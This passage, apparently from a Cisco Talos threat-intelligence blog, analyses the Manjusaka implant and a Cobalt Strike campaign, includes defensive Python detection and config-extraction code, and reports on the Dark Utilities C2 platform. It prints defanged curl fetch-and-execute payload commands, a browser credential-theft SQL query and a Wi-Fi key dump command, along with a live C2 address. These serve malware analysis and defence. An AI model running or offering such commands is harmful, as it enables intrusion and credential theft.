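    """Split a raw HTTP/1.x message into (start line, lower-cased header dict, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers, body

def has_binary_cookie(cookie_header):
    """True if any cookie value base64-decodes to mostly non-printable bytes, the shape of
    the implant's compressed fingerprint blob. Cookie names are ignored because the
    analysis does not name the cookie (the name "session" below is a placeholder)."""
    for part in cookie_header.split(";"):
        _, _, value = part.strip().partition("=")
        try:
            blob = base64.b64decode(value, validate=True)
        except (binascii.Error, ValueError):
            continue
        if len(blob) >= 16 and sum(0x20 <= b < 0x7F for b in blob) < len(blob) / 2:
            return True
    return False

def score_transaction(request, response):
    """Return (score, reasons) for one request/response pair; each matched marker adds one."""
    reasons = []
    request_line, req_headers, req_body = parse_http_message(request)
    method, target = (request_line.split(" ") + ["", ""])[:2]
    if urlsplit(target).path == BEACON_PATH:
        reasons.append("request for the beacon path " + BEACON_PATH)
    if method == "GET" and req_body == REQUEST_MARKER:
        reasons.append("GET carrying the two-byte body 19 1a")
    if has_binary_cookie(req_headers.get("cookie", "")):
        reasons.append("cookie value is base64 of binary data (fingerprint blob)")
    status_line, resp_headers, resp_body = parse_http_message(response)
    status = (status_line.split(" ") + [""])[1]
    if resp_body == C2_DEFAULT_REPLY:
        reasons.append("response body is the five-byte C2 default reply 1a1a6e0429")
    location_host = urlsplit(resp_headers.get("location", "")).hostname or ""
    if status == "302" and location_host in REDIRECT_HOSTS:
        reasons.append("302 redirect to " + location_host + " (cookie-less request)")
    return len(reasons), reasons

def is_suspicious(request, response, threshold=2):
    """Flag a pair only when several markers line up, so an ordinary favicon fetch or a
    lone binary-looking cookie does not alert on its own."""
    return score_transaction(request, response)[0] >= threshold

# Constructed traffic modelled on the exchange described above; host names are placeholders.
_FAKE_BLOB = bytes(range(40))  # stands in for the compressed fingerprint data
IMPLANT_REQUEST = (b"GET /global/favicon.png HTTP/1.1\r\nHost: c2.example.invalid\r\n"
                   b"Cookie: session=" + base64.b64encode(_FAKE_BLOB) +
                   b"\r\nContent-Length: 2\r\n\r\n" + REQUEST_MARKER)
NO_COOKIE_REQUEST = (b"GET /global/favicon.png HTTP/1.1\r\nHost: c2.example.invalid\r\n"
                     b"Content-Length: 2\r\n\r\n" + REQUEST_MARKER)
C2_RESPONSE = b"HTTP/1.1 200 OK\r\nContent-Length: 5\r\n\r\n" + C2_DEFAULT_REPLY
REDIRECT_RESPONSE = (b"HTTP/1.1 302 Found\r\nLocation: http://micsoft.com\r\n"
                     b"Content-Length: 0\r\n\r\n")
BENIGN_REQUEST = b"GET /favicon.ico HTTP/1.1\r\nHost: intranet.example\r\n\r\n"
BENIGN_RESPONSE = (b"HTTP/1.1 200 OK\r\nContent-Type: image/x-icon\r\n"
                   b"Content-Length: 4\r\n\r\n\x00\x00\x01\x00")
```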


Implant capabilities


The implant consists of a multitude of remote access trojan (RAT) capabilities that include some standard functionality and a dedicated file management module.




Switch cases for handling various requests received by the C2.


Commands serviced by the RAT


The implant can perform the following functions on the infected endpoint based on the request and accompanying data received from the C2 server:

  • Execute arbitrary commands: The implant can run arbitrary commands on the system using "cmd.exe /c".



  • Get file information for a specified file: Creation and last write times, size, volume serial number and file index.
  • Get information about the current network connections (TCP and UDP) established on the system, including Local network addresses, remote addresses and owning Process IDs (PIDs).
  • Collect browser credentials: Specifically for Chromium-based browsers, using the query SELECT signon_realm, username_value, password_value FROM logins; Browsers targeted: Google Chrome, Chrome Beta, Microsoft Edge, 360 (Qihoo), QQ Browser (Tencent), Opera, Brave and Vivaldi.
  • Collect Wi-Fi SSID information, including passwords using the command: netsh wlan show profile <WIFI_NAME> key=clear


  • Obtain Premiumsoft Navicat credentials: Navicat is a graphical database management utility that can connect to a variety of DB types such as MySQL, Mongo, Oracle, SQLite, PostgreSQL, etc. The implant enumerates through the installed software's registry keys for each configured DB server and obtains the values representing the Port, UserName, Password (Pwd).


  • Take screenshots of the current desktop.
  • Obtain comprehensive system information from the endpoint, including:
    • System memory global information.
    • Processor power information.
    • Current and critical temperature readings from WMI using "SELECT * FROM MSAcpi_ThermalZoneTemperature".
    • Information on the network interfaces connected to the system: names.
    • Process and System times: User time, exit time, creation time, kernel time.
    • Process module names.
    • Disk and drive information: Volume serial number, name, root path name and disk free space.
    • Network account names, local groups.
    • Windows build and major version numbers.
  • Activate the file management module to carry out file-related activities.


File Management Capabilities


The file management capabilities of the implant include:

  • File enumeration: List files in a specified location on disk. This is essentially the "ls" command.
  • Create directories on the file system.
  • Get and set the current working directory.
  • Obtain the full path of a file.
  • Delete files and remove directories on disk.
  • Move files between two locations. Copy the file to a new location and delete the old copy.



Copy-file operation performed as part of the move.

  • Read and write data to and from the file.


ELF variant


The ELF variant consists of pretty much the same set of functionalities as its Windows counterpart. However, two key functionalities missing in the ELF variant are the ability to collect credentials from Chromium-based browsers and harvest Wi-Fi login credentials.

Just like the Windows version, the ELF variant also collects a variety of system-specific information from the endpoint:

  • Global system information such as page size, clock tick count, current time, hostname, version, release, machine ID, etc.
  • System memory information from /proc/meminfo including cached memory size, free and total memory, swap memory sizes and Slab memory sizes.
  • System uptime from /proc/uptime: System uptime and idle time of cores.
  • OS identification information from /proc/os-release and lsb-release.
  • Kernel activity information from /proc/stat.
  • CPU information from /proc/cpuinfo and /sys/devices/system/cpu/cpu*/cpufreq/scaling_max_freq.
  • Temperature information from /sys/class/hwmon and /sys/class/thermal/thermal_zone*/temp.
  • Network interfaces information and statistics from /sys/class/net.
  • Device mount and file system information. SCSI device information.
  • Account information from /etc/passwd and group lists of users.


Both versions contain functionally equivalent file management modules that are used exclusively for managing files and directories on the infected system.



EXE vs ELF versions of the implant containing functionally equivalent file management modules.


Command and control server


During the course of our investigation, we discovered a copy of the C2 server binary for Manjusaka hosted on GitHub at hxxps://github[.]com/YDHCUI/manjusaka.

It can monitor and administer an infected endpoint and can generate corresponding payloads for Windows and Linux. The payloads generated are the Rust implants described earlier.

The C2 server and admin panel are primarily built on the Gin Web Framework which is used to administer and issue commands to the Rust-based implants/stagers.



C2 server implant generation prompt.

After filling in the options, the operator presses the "generate" button. This fires a GET request to the C2 in the format below.

http://<C2_IP_ADDRESS>:<Port>/agent?c=<C2_IP_ADDRESS>:<PORT>&t=<EXTENDED_URL_for_C2>&k=<ENCRYPTION_KEY>&w=true

The C2 server will then generate a configured Rust-based implant for the operator. The C2 uses packr to store the unconfigured Rust-based implant inside the C2 binary, so a single packaged C2 binary can generate implants without any external dependencies.

The C2 will open a "box" — i.e., a virtual folder within the GoLang-based C2 binary — that consists of a dummy Rust implant at location "plugins/npc.exe". This executable is a pre-built version of the Rust implant that is then hot-patched by the C2 server based on the C2 information entered by the operator via the Web UI.

The skeleton Rust implant contains placeholders for the C2 IP/domain and the extended URLs in the form of the repeated special characters "$" and "*" respectively, 0x21 (33) repetitions each.

For example, the placeholder for the C2 IP/domain in the dummy implant is (hex):

24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24

which is then replaced by the C2 with an IP address such as:

33 39 2E 31 30 34 2E 39 30 2E 34 35 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24

The hot-patched binary is then served to the operator to download in response to the HTTP GET request from earlier.
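The padding scheme above also gives defenders a way to pull the configuration back out of a sample. The following is an added example (not part of the Manjusaka tooling or this analysis) that locates the 33-byte '$'- and '*'-padded fields in an implant image; the implant images are constructed, with the C2 field assembled from the hex bytes shown above.

```python
import re

FIELD_LEN = 0x21  # 33 bytes: the placeholder length named in the analysis above
FILL_CHARS = {b"$": "c2", b"*": "url"}  # '$' pads the C2 address, '*' the extended URL

def candidate_fields(data, fill):
    """Yield (offset, value) for every 33-byte window that ends in a run of `fill` and
    whose remaining prefix is printable ASCII free of the fill byte. A value of ""
    means the placeholder is still untouched (an unconfigured template). This is a
    heuristic: an unrelated short run of '$' preceded by printable text also matches,
    so hits should be sanity-checked against the strings around them."""
    for m in re.finditer(re.escape(fill) + b"+", data):
        run_len = m.end() - m.start()
        if run_len > FIELD_LEN or m.end() < FIELD_LEN:
            continue
        prefix = data[m.end() - FIELD_LEN:m.start()]
        if fill in prefix or any(not 0x21 <= b <= 0x7E for b in prefix):
            continue
        yield m.end() - FIELD_LEN, prefix.decode("ascii")

def extract_config(data):
    """Recover the hot-patched C2 address and extended URL from an implant image.
    A missing key means no candidate window of that kind was found at all."""
    config = {}
    for fill, key in FILL_CHARS.items():
        for offset, value in candidate_fields(data, fill):
            config[key] = value
            config[key + "_offset"] = offset
            break  # one field of each kind is expected
    return config

def describe(data):
    """One-line analyst summary of what extract_config found."""
    config = extract_config(data)
    if "c2" not in config:
        return "no Manjusaka placeholder fields found"
    if not config["c2"]:
        return "unconfigured template: placeholders are unfilled"
    return f"C2 {config['c2']!r} at 0x{config['c2_offset']:x}, URL {config.get('url')!r}"

# Constructed implant images. The C2 field is built from the hex shown above
# ("39.104.90.45" followed by 21 '$'); the URL field pads "/global/favicon.png" to
# 33 bytes with '*'. The filler bytes stand in for the rest of the executable.
_C2_FIELD = bytes.fromhex("33392E3130342E39302E3435" + "24" * 21)
_URL = b"/global/favicon.png"
_URL_FIELD = _URL + b"*" * (FIELD_LEN - len(_URL))
PATCHED_IMPLANT = b"MZ" + b"\x90" * 40 + _C2_FIELD + b"\x00" * 7 + _URL_FIELD + b"\x00" * 9
TEMPLATE_IMPLANT = b"MZ" + b"\x90" * 40 + b"$" * FIELD_LEN + b"\x00" * 7 + b"*" * FIELD_LEN
```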



The campaign: Infection chain


We've also discovered a related campaign that consisted of a distribution of a maldoc to targets leading to the deployment of Cobalt Strike beacons on the infected systems.

The infection chain involves the use of a maldoc masquerading as a report and advisory on the COVID-19 pandemic in Golmud City, one of the largest cities in the Haixi Mongol and Tibetan Autonomous Prefecture, Qinghai Province — specifically citing a case of COVID-19 and the subsequent contact tracing of individuals.


Maldoc lure masquerading as a report on a COVID-19 case in Golmud City.


Maldoc analysis


The maldoc contains a VBA macro that executes rundll32.exe and injects Metasploit shellcode (Stage 1) into the process to download and execute the next stage (Stage 2) in memory.

The Stage 1 shellcode reached out to 39[.]104[.]90[.]45/2WYz.



Stage 1 shellcode downloading the next stage (Stage 2) from a remote location.


Stage 2 analysis


The next stage payload downloaded from the remote location is yet another shellcode that consists of:

  • XOR-encoded executable: Cobalt Strike.
  • Shellcode for decoding and reflectively loading the Cobalt Strike beacon into memory.


Code for decoding Stage 3 (Cobalt Strike beacon) in memory and executing it from the beginning of the MZ.


Stage 3: Cobalt Strike beacon


The Cobalt Strike beacon decoded by the previous stage is then executed from the beginning of the MZ file. The beacon can reflectively load itself into the memory of the current process.


Beacon calculating and calling the address of the DLL export, which enables it to reflectively load into the current process.

The beacon's config is XOR-encoded with the single-byte key 0x4D. The configuration is:

BeaconType -                      HTTPS
Port -                            443
SleepTime -                       60000
MaxGetSize -                      1048576
Jitter -                          0
MaxDNS -                          Not Found
PublicKey -
b'0\x81\x9f0\r\x06\t*\x86H\x86\xf7\r\x01\x01\x01\x05\x00\x03\x81\x8d\x000\x81\x89\x02\x81\x81\x00\x95\xe2\xd1\xdd1N\x99\x13W%\xdd\x86\x1ep\xf7c\x12\x8f\xf3\xc3\x81\x93\xc7\n84\xa2^T\x13\x93\x8d6\xec\xb5V\x931\x01\xd2\x87o\xa1\xa8\x10\xea\x9f\x8c\xc2uY\x92\xa0z\x82d1m\x02\xa44\xdbc\xdf\xd7\x1d#2U\x1b\x158\xc8\x1dqX\x91\xe5\[email protected]\x9a\xe2\xea\x0b\xd2\xcd\x9f\xae\xb1h\x08\x15|\xa3\x0cc\xde<\x17o|\x0c\x96\x878\xd2\xb4|\x86}\xa7H\x99\xd7\x8fc\xc8#\xe7W7\xec\x8fmx\xeb\xe3{\x02\x03\x01\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'

C2Server -                    39[.]104[.]90[.]45,/IE9CompatViewList.xml
UserAgent -                       Not Found
HttpPostUri -                     /submit.php
HttpGet_Metadata -                Not Found
HttpPost_Metadata -               Not Found
SpawnTo - b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'

PipeName -                        Not Found
DNS_Idle -                        Not Found
DNS_Sleep -                       Not Found
SSH_Host -                        Not Found
SSH_Port -                        Not Found
SSH_Username -                    Not Found
SSH_Password_Plaintext -          Not Found
SSH_Password_Pubkey -             Not Found
HttpGet_Verb -                    GET
HttpPost_Verb -                   POST
HttpPostChunk -                   0
Spawnto_x86 -                     %windir%\syswow64\rundll32.exe
Spawnto_x64 -                     %windir%\sysnative\rundll32.exe
CryptoScheme -                    0
Proxy_Config -                    Not Found
Proxy_User -                      Not Found
Proxy_Password -                  Not Found
Proxy_Behavior -                  Use IE settings
Watermark -                       999999
bStageCleanup -                   False
bCFGCaution -                     False
KillDate -                        0
bProcInject_StartRWX -            True
bProcInject_UseRWX -              True
bProcInject_MinAllocSize -        0
ProcInject_PrependAppend_x86 -    Empty
ProcInject_PrependAppend_x64 -    Empty
ProcInject_Execute -              CreateThread
                                  SetThreadContext
                                  CreateRemoteThread
                                  RtlCreateUserThread
ProcInject_AllocationMethod -     VirtualAllocEx
bUsesCookies -                    True
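The listing above is what a beacon config extractor produces once the XOR layer is removed. The Python below is an added example, not Talos's extractor and not Cobalt Strike code, that shows how such a tool locates and decodes the config. It relies on the publicly documented beacon config layout that open-source parsers use, which this post does not describe: big-endian TLV records of index, type and length (type 1 = short, 2 = int, 3 = data), starting with setting 1 (BeaconType), terminated by index 0, and XOR-encoded with one byte. The setting-name table is a subset; only indices the author is confident of are named. Known keys (the 0x4D from this sample and the stock 0x69 and 0x2E) are tried first, then every single-byte key, so a beacon with a non-default key is still found. The sample blob is a constructed fixture carrying the values listed above, not a real beacon.

```python
import struct
from typing import Optional, Tuple

# Beacon config records are big-endian TLVs: index (u16), type (u16), length (u16), value.
# Type 1 = 16-bit short, 2 = 32-bit int, 3 = raw data. Index 0 terminates the config.
T_SHORT, T_INT, T_DATA = 1, 2, 3
# Setting 1 (BeaconType) is always the first record, a short of length 2, which gives a
# known plaintext to search for under every candidate XOR key.
CONFIG_HEADER = b"\x00\x01\x00\x01\x00\x02"
# Subset of the setting indices; unmapped indices are reported as Setting_<n>.
SETTING_NAMES = {1: "BeaconType", 2: "Port", 3: "SleepTime", 4: "MaxGetSize", 5: "Jitter",
                 6: "MaxDNS", 7: "PublicKey", 8: "C2Server", 9: "UserAgent",
                 10: "HttpPostUri", 29: "Spawnto_x86", 30: "Spawnto_x64", 37: "Watermark"}
BEACON_TYPES = {0: "HTTP", 1: "Hybrid HTTP DNS", 2: "SMB", 4: "TCP", 8: "HTTPS", 16: "Bind TCP"}


def xor(data: bytes, key: int) -> bytes:
    return bytes(b ^ key for b in data)


def find_config(blob: bytes, keys=(0x4D, 0x69, 0x2E)) -> Optional[Tuple[int, int]]:
    """Locate the encoded config. The keys in `keys` are tried first, then every other
    single-byte key. Returns (offset, key) or None."""
    for key in list(keys) + [k for k in range(256) if k not in keys]:
        off = blob.find(xor(CONFIG_HEADER, key))
        if off != -1:
            return off, key
    return None


def parse_config(blob: bytes) -> dict:
    """Decode the config and return {setting_name: value}, plus the key under "_xor_key"."""
    hit = find_config(blob)
    if hit is None:
        raise ValueError("no beacon config header found under any single-byte XOR key")
    off, key = hit
    data = xor(blob[off:], key)
    settings = {"_xor_key": key}
    pos = 0
    while pos + 6 <= len(data):
        idx, typ, length = struct.unpack(">HHH", data[pos:pos + 6])
        pos += 6
        if idx == 0 or pos + length > len(data):
            break  # terminator, or a truncated record
        raw = data[pos:pos + length]
        pos += length
        if typ == T_SHORT and length == 2:
            val = struct.unpack(">H", raw)[0]
        elif typ == T_INT and length == 4:
            val = struct.unpack(">I", raw)[0]
        else:
            val = raw.rstrip(b"\x00")  # data fields are null-padded to a fixed width
            if val and all(0x20 <= c < 0x7F for c in val):
                val = val.decode("ascii")
        if idx == 1:
            val = BEACON_TYPES.get(val, f"Unknown({val})")
        settings[SETTING_NAMES.get(idx, f"Setting_{idx}")] = val
    return settings


def _rec(idx: int, typ: int, value: bytes) -> bytes:
    return struct.pack(">HHH", idx, typ, len(value)) + value


def build_sample(key: int = 0x4D) -> bytes:
    """Constructed fixture only: a config carrying the values listed in the post,
    XOR-encoded with `key` and embedded between unrelated bytes."""
    cfg = b"".join([
        _rec(1, T_SHORT, struct.pack(">H", 8)),       # 8 = HTTPS
        _rec(2, T_SHORT, struct.pack(">H", 443)),
        _rec(3, T_INT, struct.pack(">I", 60000)),
        _rec(4, T_INT, struct.pack(">I", 1048576)),
        _rec(5, T_SHORT, struct.pack(">H", 0)),
        _rec(8, T_DATA, b"39.104.90.45,/IE9CompatViewList.xml".ljust(256, b"\x00")),
        _rec(10, T_DATA, b"/submit.php".ljust(64, b"\x00")),
        _rec(29, T_DATA, b"%windir%\\syswow64\\rundll32.exe".ljust(64, b"\x00")),
        _rec(30, T_DATA, b"%windir%\\sysnative\\rundll32.exe".ljust(64, b"\x00")),
        _rec(37, T_INT, struct.pack(">I", 999999)),
        b"\x00" * 6,                                   # index 0: end of config
    ])
    return b"MZ\x90\x00" + b"\x90" * 32 + xor(cfg, key) + b"\x00" * 16


if __name__ == "__main__":
    for name, value in parse_config(build_sample()).items():
        print(f"{name:<14} {value}")
```

The same header search is what lets a memory scanner flag a beacon without knowing its key in advance: the six-byte pattern XORed with each of 256 candidates is cheap to test, and a hit is followed by a structural check (the records must parse and terminate) to rule out chance matches in large images.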



Attribution


Before even thinking about the attribution, it's important to distinguish between the developer of the malware and the campaign operators. The C2 binary is fully functional (although limited in features), self-contained and publicly available, which means that anyone could have downloaded it and used it in the campaign we discovered.

As such, we have decided to list the data points that could be interpreted as a possible indicator and encourage the community to perform the analysis and add other data points that might contribute to the attribution, either for the campaign or for the developers behind the framework.

For this campaign, there isn't much to lead to formal attribution with any confidence, besides the fact that the maldoc refers to a COVID-19 outbreak in Golmud City, offering a detailed timeline of the outbreak.

For the developer of Manjusaka, we have several indicators:

  • The Rust-based implant does not use the standard crates.io repository for dependency resolution. Instead, it was manually configured by the developers to use the mirror located at ustc[.]edu[.]cn, the University of Science and Technology of China.
  • The C2 menus and options are all written in Simplified Chinese.
  • Our OSINT suggests that the author of this framework is located in the GuangDong region of China.


Conclusion


The availability of the Manjusaka offensive framework is an indication of the popularity of widely available offensive technologies with both crimeware and APT operators. This new attack framework contains all the features one would expect from an implant, but it is written in modern and portable programming languages. The developer of the framework can easily integrate new target platforms like MacOSX or more exotic flavors of Linux, such as those running on embedded devices. The fact that the developer made a fully functional version of the C2 available increases the chances of wider adoption of this framework by malicious actors.

Organizations must be diligent against such easily available tools and frameworks, which can be misused by a variety of threat actors. Defense-in-depth strategies based on a risk analysis approach deliver the best results in prevention. They should always be complemented by a good incident response plan that has not only been tested with tabletop exercises but is also reviewed and improved every time it is put to the test in real engagements.


Coverage


Ways our customers can detect and block this threat are listed below.



Cisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in this post. Try Secure Endpoint for free here.

Cisco Secure Web Appliance web scanning prevents access to malicious websites and detects malware used in these attacks.

Cisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their campaign. You can try Secure Email for free here.

Cisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat Defense Virtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this threat.

Cisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure products.

Umbrella, Cisco's secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and URLs, whether users are on or off the corporate network. Sign up for a free trial of Umbrella here.

Cisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests suspicious sites before users access them.

Additional protections with context to your specific environment and threat data are available from the Firewall Management Center.

Cisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your network.

Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.




IOCs


IOCs for this research can also be found at our Github repository here.

Hashes


Maldoc and CS beacon samples

58a212f4c53185993a8667afa0091b1acf6ed5ca4ff8efa8ce7dae784c276927
8e7c4df8264d33e5dc9a9d739ae11a0ee6135f5a4a9e79c354121b69ea901ba6
54830a7c10e9f1f439b7650607659cdbc89d02088e1ab7dd3e2afb93f86d4915


Rust samples

8e9ecd282655f0afbdb6bd562832ae6db108166022eb43ede31c9d7aacbcc0d8
a8b8d237e71d4abe959aff4517863d9f570bba1646ec4e79209ec29dda64552f
3f3eb6fd0e844bc5dad38338b19b10851083d078feb2053ea3fe5e6651331bf2
0b03c0f3c137dacf8b093638b474f7e662f58fef37d82b835887aca2839f529b


C2 binaries

fb5835f42d5611804aaa044150a20b13dcf595d91314ebef8cf6810407d85c64
955e9bbcdf1cb230c5f079a08995f510a3b96224545e04c1b1f9889d57dd33c1


URLs

https[://]39[.]104[.]90[.]45/2WYz
http[://]39[.]104[.]90[.]45/2WYz
http[://]39[.]104[.]90[.]45/IE9CompatViewList.xml
http[://]39[.]104[.]90[.]45/submit.php


User-Agents

Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Mozilla/5.0 (Windows NT 8.0; WOW64; rv:58.0) Gecko/20120102 Firefox/58
Mozilla/5.0 (Windows NT 8.0; WOW64; rv:40.0) Gecko


IPs

39[.]104[.]90[.]45








0xCC'd

4 August 2022 at 11:01

We spend a lot of time preparing for Blackhat, and as part of putting together content for the show, one of our best, Lurene Grenier, submitted an unexpected piece of content: a poem. Now this poem isn't our regular security research or a shiny piece of corporate correspondence (which we would never do anyways) — but it is raw, and it is painful and it is brilliant. And it raises a number of issues that Cisco takes very seriously, including work-life balance and mental health. In particular, by my interpretation, it speaks about early-in-career work-life balance. I know at that point in my career I felt grateful just to be in the industry while at the same time I felt powerless to advocate for myself in the face of the overwhelming demands of the workplace. This poem hit me hard, and in truth I wouldn't want it published anywhere other than on the Talos blog. So we are presenting Lurene's words here, in hopes that they trigger important conversations and also to remind everyone to just take care of each other. If you'd like to chat with Lurene or myself or another Cisco manager about these issues, we'll be at the Cisco booth (#1932) at Blackhat.  Please come by, say hi, and share your thoughts.

-- Matthew Olney

-- Director, Threat Intelligence & Interdiction

0xCC'd

manuals were thick plasticized paper on spiral bindings
made to see use expected to tolerate the conditions just as
you were conditioned to dusty basement rooms low hanging
yellowed fluorescent lights heavy doors beige and gray and
square doing nothing to help that all nighter we'll just
add a headache on top of that have fun nothing hurts when
youre 20 or maybe you just didnt know you could not hurt

drop ceilings and too much air conditioning my friend got
pneumonia on a 100 degree day from entering and leaving
server rooms he laughs about it by the way if the alarm
goes off run theyll kill you to keep the website up

text debuggers and assembly manuals and intel 3A our computing
center at RPI was a gothic church the pews rows and rows of
gray purple lunch boxes candied irix gumdrops stoic yellowed
SCO pizza boxes square blue chunky power buttons I was a
believer worshiping the saints studying hennessy groaning
through chomsky it was more useful than I imagined it might be

bringing life to hot dead business parks all bricks and
bland cubicle walls with all the myriad ways to avoid
the frustrations with setting up test systems and chasing
your own tail foos ball minor explosives research chemicals
and every other manic desperate strangeness devised by
our ingenium

who devoted their nights and weekends to the stability
of other people's e-shops willingly giving away life to
retain the privilege of gaining sustenance from a work
they might have loved rather than one they certainly
despised

who blacked out more than once from exhaustion or booze
or electric scooters in parking lots concussed but no
worse for the wear or so we believed nothing hurts when
youre 20

who escaped from las vegas in twos and threes in the
early hours because just maybe theyd had too much
too fast in unrenovated garish hotel rooms in long
gone casino hotels

who pointed all their firewalls in the wrong direction

who were equally devoured by ads and consolidation and
the little computer that isnt yours and you cant control
but controls you

who gave up on art and culture some time around when
they decided it was worth it to consider buying
a new tesla a smart trade says dad

what sphinx of aluminum and silicon and guerilla glass
bashed open their skulls and ate up their brains and imagination

Hold on a little longer hipsters - I miss your angel heads
-- Lurene Grenier

Attackers leveraging Dark Utilities "C2aaS" platform in malware campaigns

4 August 2022 at 12:00
By Edmund Brumaghin, Azim Khodjibaev and Matt Thaxton, with contributions from Arnaud Zobec.

Executive Summary


  • Dark Utilities, released in early 2022, is a platform that provides full-featured C2 capabilities to adversaries.
  • It is marketed as a means to enable remote access, command execution, distributed denial-of-service (DDoS) attacks and cryptocurrency mining operations on infected systems.
  • Payloads provided by the platform support Windows, Linux and Python-based implementations and are hosted within the InterPlanetary File System (IPFS), making them resilient to content moderation or law enforcement intervention.
  • Since its initial release, we've observed malware samples in the wild leveraging it to facilitate remote access and cryptocurrency mining.


What is "Dark Utilities?"


In early 2022, a new C2 platform called "Dark Utilities" was established, offering a variety of services such as remote system access, DDoS capabilities and cryptocurrency mining. The operators of the service also established Discord and Telegram communities where they provide technical support and assistance for customers on the platform.
Dark Utilities provides payloads consisting of code that is executed on victim systems, allowing them to be registered with the service and establish a command and control (C2) communications channel. The platform currently supports Windows, Linux and Python-based payloads, allowing adversaries to target multiple architectures without requiring significant development resources. During our analysis, we observed efforts underway to expand OS and system architecture support as the platform continues to see ongoing development activities occurring.

The platform, hosted on the clear internet and Tor network, offers premium access to the platform, associated payloads and API endpoints for 9.99 euros. At the time of writing, the platform had enrolled roughly 3,000 users, which is approximately 30,000 euros in income. Given the relatively low cost compared to the amount of functionality the platform offers, it is likely attractive to adversaries attempting to compromise systems without requiring them to create their own C2 implementation within their malware payloads.
Almost immediately, we observed malware samples using this service in the wild as a way to establish C2 communications channels and remote access capabilities on infected systems. We've observed malware targeting both Windows and Linux systems leveraging Dark Utilities.


Dark Utilities platform functionality


The Dark Utilities platform leverages Discord for user authentication. Once authenticated, users are presented with a dashboard displaying various statistics about the platform, server health status and other metrics.
To register new bots with the service, a payload must be generated and deployed on victim machines. At the time of writing, the platform supports several operating systems, as shown in the payload selection drop-down below.
Selecting an operating system causes the platform to generate a command string that threat actors typically embed into PowerShell or Bash scripts to retrieve and execute the payload on victim machines. An example of this for a payload targeting the Windows operating system is shown below.
cd %userprofile%\Documents && mkdir Steam &&  cd .\Steam &&  curl hxxps[:]//ipfs[.]infura[.]io/ipfs/QmRLaPCGa2HZTxMPQxU2VnB9qda3mUv21TXrjbMNqkxN6Z >> launcher.exe &&  .\launcher.exe [ACCOUNT_STRING_PARAMETER]
For Linux-based payloads, an example command string is:
cd /tmp/;curl hxxps[:]//ipfs[.]infura[.]io/ipfs/QmVwqSG7TGceZJ6MWnKgYkiyqnW4qTTRq61ADDfMJaPEoG > ./tcp-client;chmod +x tcp-client; ./tcp-client [ACCOUNT_STRING_PARAMETER]
Recently, the platform added support for other architectures such as ARM64 and ARMV71, which they describe as being useful for targeting various embedded devices such as routers, phones and internet-of-things (IoT) devices, as shown below.
The use of IPFS for hosting the payload binaries provides resilience against content moderation or takedowns, as IPFS is a distributed, peer-to-peer network explicitly designed to prevent centralized authorities from taking action on content hosted there. IPFS supports the use of IPFS gateways, which operate similarly to Tor2Web gateways in that they allow users on the internet to access content hosted within IPFS without installing a client application. We have observed adversaries increasingly making use of this infrastructure for payload hosting and retrieval, as it effectively provides "bulletproof hosting." A publicly maintained list of IPFS gateways is shown below.
For administering bots that have been registered with the Dark Utilities platform, a "Manager" administrative panel is provided. The panel lists the systems under the account's control and provides several built-in modules for using them to conduct denial-of-service attacks, perform cryptocurrency mining, and execute commands across systems under their control.
The platform provides built-in interfaces for conducting two different types of DDoS attacks, both of which support multiple methods. Layer 4 supports TCP, UDP and ICMP, as well as a number of methods designed for specific gaming platforms such as Teamspeak3, Fivem, GMOD and Valve, along with specific video games like "Counter Strike: Global Offensive" and "Among Us." Layer 7 supports the GET, POST, HEAD, PATCH, PUT, DELETE, OPTIONS and CONNECT methods. The interface contains forms for configuring Layer 4 and Layer 7 DDoS attacks respectively, as shown below.
The cryptocurrency mining functionality leverages pool[.]hashvault[.]pro for Monero mining and simply requires that the adversary's Monero wallet address be provided.
The platform also provides distributed command execution as well as a Discord grabber that can be run against large numbers of systems simultaneously.
Once an infected system has established an active C2 channel, the adversary obtains full access to the system in the context of the compromised user account. An interactive PowerShell prompt is provided directly within the admin panel.
A built-in Python interpreter allows adversaries to define Python scripts to be executed on systems under their control from within the admin panel itself.
The platform also exposes a REST API that can automate the administration of compromised systems.
Example code is provided for instructing compromised systems to conduct DDoS attacks against targets.
The marketing and rules associated with the use of the platform appear to attempt to minimize liability for the platform operators by staying within legal gray areas with regard to the use of the platform for illegal or illicit purposes.
The documentation provided by the platform, however, also provides step-by-step instructions for conducting reconnaissance, identifying vulnerabilities and exploiting them to "infect servers" for use in a botnet.
Given the low cost associated with the platform and the amount of functionality it provides, it is likely that this will continue to be increasingly popular with threat actors seeking to build botnets without requiring significant amounts of time and effort to develop their own malware.
 

Who is behind Dark Utilities?


